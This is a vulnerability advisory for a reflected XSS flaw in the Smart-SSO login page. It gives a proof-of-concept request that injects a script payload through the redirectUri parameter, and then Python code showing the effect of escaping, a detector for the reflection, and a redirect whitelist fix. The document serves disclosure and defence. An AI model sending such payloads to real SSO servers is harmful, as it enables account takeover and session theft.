Smart-SSO is a lightweight, high-availability Single Sign-On (SSO) authentication and authorization center built on Spring Boot and the OAuth2 protocol, with an RBAC (Role-Based Access Control) permission design.
Reflected XSS vulnerabilities occur when an application writes user input straight back into the response page without proper escaping or validation, so a crafted request can inject markup and script into the page the victim receives.
Affected Versions: Smart-SSO 2.1.1 and earlier
Vulnerable Location: smart-sso-server/src/main/resources/templates/login.html
<!-- Lines 75-76 - User input directly output to HTML attributes -->
<input type="hidden" name="redirectUri" value="${redirectUri}"/>
<input type="hidden" name="clientId" value="${clientId}"/>
Trigger Location: smart-sso-server/src/main/java/openjoe/smart/sso/server/controller/SSOLoginController.java
// Lines 102-105
private String goLoginPage(String redirectUri, String clientId, HttpServletRequest request) {
request.setAttribute(BaseConstant.REDIRECT_URI, redirectUri); // User controlled
request.setAttribute(BaseConstant.CLIENT_ID, clientId); // User controlled
return "/login";
}
Vulnerability Analysis:
The redirectUri and clientId query parameters are fully user-controlled: goLoginPage copies them into request attributes unchanged, and login.html writes them into the value attributes of the hidden inputs. Because the template uses the .html extension, auto-escaping is NOT enabled by default, so a double quote in either value closes the attribute and everything after it is parsed as markup. Either parameter can carry the payload.
Method 1: Via redirectUri parameter injection
Send the payload URL-encoded, as a browser would; embedded Tomcat rejects a raw `"` or `<` in the request target with HTTP 400. Decoded, redirectUri is `"><script>alert(1)</script>`.
GET /sso/login?redirectUri=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&clientId=1000 HTTP/1.1
Host: sso-server.com
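To make the analysis and the PoC above concrete, here is an added Python example (not code from Smart-SSO or its author) that reproduces the output shape of the two hidden inputs, renders the PoC payload both without escaping (the reported behaviour) and with attribute-context HTML escaping (the template-side fix), and verifies the result by parsing the response rather than grepping for the payload, so an entity-escaped reflection is not mistaken for a live one. It also shows the server-side control that removes the need to reflect arbitrary input at all: an exact-match check of redirectUri against the URIs registered for the client. The form markup, the client id and the registered callback URI are constructed for this example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed stand-in for the two hidden inputs in login.html. It is not the
# project's template; it only reproduces the output shape of lines 75-76 so the
# effect of (not) escaping can be observed offline.
LOGIN_FORM = (
    '<form method="post" action="/sso/login">'
    '<input type="hidden" name="redirectUri" value="{redirectUri}"/>'
    '<input type="hidden" name="clientId" value="{clientId}"/>'
    '</form>'
)


def render_login_page(redirect_uri, client_id, escape):
    """Render the form as a template without auto-escaping does (escape=False)
    and as it should be rendered (escape=True: HTML-escape each value,
    quotes included, before it lands inside an attribute)."""
    if escape:
        redirect_uri = html.escape(redirect_uri, quote=True)
        client_id = html.escape(client_id, quote=True)
    return LOGIN_FORM.format(redirectUri=redirect_uri, clientId=client_id)


class _FormScanner(HTMLParser):
    """Collects hidden-input values and counts <script> start tags."""

    def __init__(self):
        super().__init__()
        self.hidden = {}
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input" and attrs.get("type") == "hidden":
            # HTMLParser decodes entities in attribute values, so an escaped
            # reflection comes back as the original string the client sent.
            self.hidden[attrs.get("name")] = attrs.get("value")
        elif tag == "script":
            self.script_tags += 1


def reflected_unescaped(body, param, sent_value):
    """True if the value sent for `param` did not survive intact inside the
    hidden input's value attribute (it broke out into markup) or a <script>
    tag appeared in the page. Works on any saved response body."""
    scanner = _FormScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.hidden.get(param) != sent_value or scanner.script_tags > 0


def redirect_uri_allowed(redirect_uri, registered_uris):
    """Exact-match check of redirectUri against the URIs registered for the
    client (scheme, host, port and path). With this in place the login page
    never has to echo an arbitrary string back to the browser."""
    try:
        parts = urlsplit(redirect_uri)
    except ValueError:
        return False
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    return redirect_uri in registered_uris


if __name__ == "__main__":
    payload = '"><script>alert(1)</script>'
    registered = {"https://app.example.com/sso/callback"}  # hypothetical client
    for escape in (False, True):
        body = render_login_page(payload, "1000", escape)
        print(f"escape={escape}: body={body}")
        print(f"  reflected unescaped: {reflected_unescaped(body, 'redirectUri', payload)}")
    print("payload accepted as redirectUri:", redirect_uri_allowed(payload, registered))
```

To check a live target, save the response to the Method 1 request (for example with curl) and pass it to `reflected_unescaped` with the decoded payload; a server that has enabled template auto-escaping or escaped the values itself returns `False`, while a vulnerable 2.1.1 server returns `True`. The whitelist check belongs in the controller before goLoginPage is reached, so an unregistered redirectUri is rejected instead of rendered.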
